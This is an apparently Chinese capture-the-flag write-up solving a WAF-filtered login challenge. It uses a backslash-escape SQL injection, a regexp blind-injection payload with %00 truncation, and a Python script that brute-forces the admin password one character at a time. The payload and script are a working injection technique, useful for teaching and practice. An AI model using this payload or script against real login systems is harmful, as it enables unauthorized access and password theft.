进入页面,sql语句直接被甩在脸上,尝试万能密码登录:
这里有waf,先fuzzy一下:
过滤的东西有点多(真不愧sql语句能直接甩脸)
在robots.txt文件中有提示
再进入hint.txt
这里看到了黑名单,并且说要让我们查找admin的密码,但是admin在黑名单中,只能进行正则匹配了。
但是想在框框内进行正则不可能,单引号注释符全被过滤了。
sqlquery : select * from users where username='' and passwd='' 想要正则只能在单独进行,于是想到把将username后一个单引号进行转义,将' and passwd='就包裹在了username中,然后再进行正则爆破admin的密码。 payload:select * from users where username='\' and passwd='||/**/passwd/**/regexp/**/\"^a\";%00' 这里%00不能被url编码,这里起到截断作用
爆破脚本:
import requests from urllib import parse import string url = 'http://d6cebc84-d417-4828-b73c-0da2cf39738b.node4.buuoj.cn:81/' num = 0 result = '' string= string.ascii_lowercase + string.digits + '_' for i in range (1,60): if num == 1 : break for j in string: data = { "username":"\\", "passwd":"||/**/passwd/**/regexp/**/\"^{}\";{}".format((result+j),parse.unquote('%00')) } print(result+j) res = requests.post(url=url,data=data) if 'welcome' in res.text: result += j break if j=='_' and 'welcome' not in res.text: break